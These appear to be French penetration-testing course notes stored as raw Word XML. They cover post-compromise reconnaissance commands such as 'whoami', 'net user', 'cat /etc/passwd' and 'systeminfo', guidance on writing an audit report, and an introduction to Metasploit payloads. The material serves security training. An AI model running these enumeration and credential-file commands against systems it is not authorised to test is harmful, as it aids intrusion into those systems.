    <w:p w14:paraId="20E608A5" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="33E6568B" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00B23609">
      <w:r>
        <w:t xml:space="preserve">Afficher le nom d’utilisateur -&gt; Commande sous windows et linux : whoami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Commande sous windows “net user”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="783C8A2B" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00B23609">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>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Commande sous windows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Sous linux : découvrir d’autres comptes users -&gt; Commande  sous linux : cat /etc/passwd</w:t>
      </w:r>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lastRenderedPageBreak/>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des abréviation identifiable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r>
        <w:t>db pour les serveurs de bases de données</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C1A1B48" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00B23609">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="151"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">dc pour les contrôleur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Commande sous windows et linux : hostname</w:t>
      </w:r>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vulné,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windows : systeminfo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uname -a </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F6FF4D" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00B23609">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="116"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>cat /etc/issue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22AD168C" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00B23609">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="116"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>cat /etc/*-release</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6546D013" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00B23609">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>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r>
        <w:t>sous windows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t xml:space="preserve">Arp -a </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14BD965D" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00B23609">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>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netsh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r>
        <w:t xml:space="preserve">Certaines exploits instables peuvent tuer le processus vulnérables pendant l’exploitation </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="054F465C" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00B23609">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Gagner un premier accès au réseau interne de l'extérieur est difficile à reproduire </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D4AF71C" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00B23609">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Toute vulnérabilité utilisée pour obtenir votre premier accès peut être corrigée si vos actions sont détectées..</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FF6D625" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00B23609">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="90"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>donc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5C02BF0C" w:rsidR="00223B72" w:rsidRDefault="00B23609" w:rsidP="00714AD0">
      <w:pPr>
        <w:pStyle w:val="Titre1"/>
      </w:pPr>
      <w:bookmarkStart w:id="128" w:name="_6k5yv3b7wyn4" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="128"/>
      <w:r>
        <w:t>Module 1</w:t>
      </w:r>
      <w:r w:rsidR="006100AD">
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - Rédaction du rapport </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6390669C" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="35BD4A03" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00B23609">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="CC0000"/>
        </w:rPr>
        <w:t>Document de référence</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  :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3">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0B55E54C" w:rsidR="00223B72" w:rsidRDefault="00B23609">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La synthèse managériale (contexte et </w:t>
      </w:r>
      <w:r w:rsidR="006100AD">
        <w:t>périmètre ;</w:t>
      </w:r>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B23609">
      <w:r>
        <w:t xml:space="preserve">L’objectif de cette parties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B23609">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="77"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="134F5C"/>
        </w:rPr>
        <w:t>Action pour y remédier</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> et ce , quel que soit son coeur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lastRenderedPageBreak/>
        <w:t>Partie 2 - Le résultat des tests d’intrusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E354184" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="7C1F264A" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00B23609">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cette partie du rapport d’audit s’adresse aux </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>populations techniques</w:t>
      </w:r>
      <w:r>
        <w:t>, notamment les personnes qui vont être chargées de mettre en œuvre les recommandations et ( éventuellement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r>
        <w:t>le nom ou l’intitulé que vous aurez donné à la vulnérabilité</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="607B7EEE" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00B23609">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>le détail de la vulnérabilité, suffisamment exhaustif pour localiser rapidement la vulnérabilité sur l’application;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CC15A2E" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00B23609">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B23609">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Les recommandations</w:t>
      </w:r>
      <w:r>
        <w:t>, avec;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="577C52DC" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00B23609">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>le nom ou l’intitulé que vous aurez donné à la recommandation;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5783A93F" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00B23609">
      <w:r>
        <w:t xml:space="preserve">                  b. le détail de la recommandation, ce qui est attendu des équipes et un exemple ou un lien vers un article ou des ressources aidant à implémenter la recommandation dans le cas des recommandations techniques;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7100C23B" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00B23609">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">       c. L’importance de la recommandation dans le plan d’action global</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4528444C" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00B23609">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">       d. le coût relatif ou la complexité relative que vous estimez pour la mise en oeuvre de la correction;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34D102FC" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00B23609">
      <w:r>
        <w:t xml:space="preserve">                   e .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Quel que soit le niveau de détail retenu, l’approche peut être</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A6A88D8" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00B23609">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>linéaire et chronologique</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> comme le suggère l’ANSSI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1410B272" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00B23609">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ou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d(intrusion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mettez: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A5B8557" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="64172C47" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00B23609">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="157"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Toutes les preuves de travail (les vulnérabilités, les payloads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Si un pentester repasse sur l'app quelques mois voire quelques années après vous, il doit être en mesure de comprendre exactement ce que vous avez fait et ce que vous avez trouvé à partir de votre rapport. A aucun moment, il ne doit pouvoir se dire “Mais qu’est-ce qu’il à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ceci; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A5E606E" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00B23609">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Une explication de ce que je cherche pourquoi, je le cherche et comment ça fonctionne;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A65858" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00B23609">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Le test de la vulné en question;</w:t>
      </w:r>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1286188B" w14:textId="486C2CF3" w:rsidR="00AE5DD7" w:rsidRDefault="00AE5DD7" w:rsidP="00714AD0">
      <w:pPr>
        <w:pStyle w:val="Titre1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Module X : META sploit </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="667A5E55" w14:textId="77777777" w:rsidR="00AE5DD7" w:rsidRDefault="00AE5DD7" w:rsidP="0081458C"/>
    <w:p w14:paraId="5B4CB490" w14:textId="77777777" w:rsidR="00AE5DD7" w:rsidRDefault="00AE5DD7" w:rsidP="00AE5DD7">
      <w:pPr>
        <w:pStyle w:val="Sous-titre"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Les composant metasploit </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F741170" w14:textId="77777777" w:rsidR="00AE5DD7" w:rsidRDefault="00AE5DD7" w:rsidP="00AE5DD7"/>
    <w:p w14:paraId="6D47D4D0" w14:textId="77777777" w:rsidR="00AE5DD7" w:rsidRDefault="00AE5DD7" w:rsidP="00AE5DD7">
      <w:r>
        <w:t xml:space="preserve">Msfconsole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utils </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>(payload)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> =&gt; Les payloads, ou charge utils, sont les éléments de cyberattaque </w:t>
      </w:r>
      <w:r w:rsidR="00F93599">
        <w:t xml:space="preserve">qui provoquent des dégâts. Les payloads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lastRenderedPageBreak/>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75EB51" w14:textId="77777777" w:rsidR="00B90996" w:rsidRDefault="00B90996">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="2867CDD8" w14:textId="77777777" w:rsidR="00B90996" w:rsidRDefault="00B90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014312" w14:textId="77777777" w:rsidR="00B90996" w:rsidRDefault="00B90996">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="79CF5199" w14:textId="77777777" w:rsidR="00B90996" w:rsidRDefault="00B909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33A1A"/>
    <w:rsid w:val="000D4674"/>
    <w:rsid w:val="000E037B"/>
    <w:rsid w:val="000F774F"/>
    <w:rsid w:val="00127426"/>
    <w:rsid w:val="00137BEB"/>
    <w:rsid w:val="00223B72"/>
    <w:rsid w:val="00240329"/>
    <w:rsid w:val="00297E5A"/>
    <w:rsid w:val="002C115C"/>
    <w:rsid w:val="002D2B24"/>
    <w:rsid w:val="002D5BEE"/>
    <w:rsid w:val="00302CD2"/>
    <w:rsid w:val="003214B9"/>
    <w:rsid w:val="00322D8E"/>
    <w:rsid w:val="00342D35"/>
    <w:rsid w:val="003967A2"/>
    <w:rsid w:val="003A490E"/>
    <w:rsid w:val="003F2034"/>
    <w:rsid w:val="004073B4"/>
    <w:rsid w:val="0045609F"/>
    <w:rsid w:val="00465BC2"/>
    <w:rsid w:val="00484373"/>
    <w:rsid w:val="004D256A"/>
    <w:rsid w:val="00514942"/>
    <w:rsid w:val="005276F0"/>
    <w:rsid w:val="00534394"/>
    <w:rsid w:val="005864CA"/>
    <w:rsid w:val="006100AD"/>
    <w:rsid w:val="00635AE4"/>
    <w:rsid w:val="006759F5"/>
    <w:rsid w:val="006B4620"/>
    <w:rsid w:val="006C2550"/>
    <w:rsid w:val="00714AD0"/>
    <w:rsid w:val="00790EFE"/>
    <w:rsid w:val="007A73EB"/>
    <w:rsid w:val="007C221C"/>
    <w:rsid w:val="007E7234"/>
    <w:rsid w:val="007F1D01"/>
    <w:rsid w:val="0081458C"/>
    <w:rsid w:val="00825929"/>
    <w:rsid w:val="00826D46"/>
    <w:rsid w:val="008B43C5"/>
    <w:rsid w:val="009367FF"/>
    <w:rsid w:val="009827A9"/>
    <w:rsid w:val="009A3818"/>
    <w:rsid w:val="009F7EFA"/>
    <w:rsid w:val="00A41325"/>
    <w:rsid w:val="00A73515"/>
    <w:rsid w:val="00AA17C6"/>
    <w:rsid w:val="00AC29FF"/>
    <w:rsid w:val="00AE5DD7"/>
    <w:rsid w:val="00AF367F"/>
    <w:rsid w:val="00B20CBE"/>
    <w:rsid w:val="00B23609"/>
    <w:rsid w:val="00B41BA6"/>
    <w:rsid w:val="00B90996"/>
    <w:rsid w:val="00BA62A7"/>
    <w:rsid w:val="00BD3814"/>
    <w:rsid w:val="00BD3ADB"/>
    <w:rsid w:val="00CA5E87"/>
    <w:rsid w:val="00CE66A8"/>
    <w:rsid w:val="00CF619D"/>
    <w:rsid w:val="00D14767"/>
    <w:rsid w:val="00DA57EC"/>
    <w:rsid w:val="00DC0B9A"/>
    <w:rsid w:val="00DD1A74"/>
    <w:rsid w:val="00E14CE2"/>
    <w:rsid w:val="00E63830"/>
    <w:rsid w:val="00E774D5"/>
    <w:rsid w:val="00E861EC"/>
    <w:rsid w:val="00E93F09"/>
    <w:rsid w:val="00EB280C"/>
    <w:rsid w:val="00F05E70"/>
    <w:rsid w:val="00F1129E"/>
    <w:rsid w:val="00F14980"/>
    <w:rsid w:val="00F2674C"/>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yber.gouv.fr/sites/default/files/document/R%C3%A9f%C3%A9rentiel%20PASSI%20%E2%80%93%20version%202.1-a%20%E2%80%93%20sans%20marque%20de%20r%C3%A9visio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376</TotalTime>
  <Pages>66</Pages>
  <Words>9469</Words>
  <Characters>52085</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17</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-10-22T08:21:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-10-28T18:30:00Z</dcterms:modified>
</cp:coreProperties>
</file>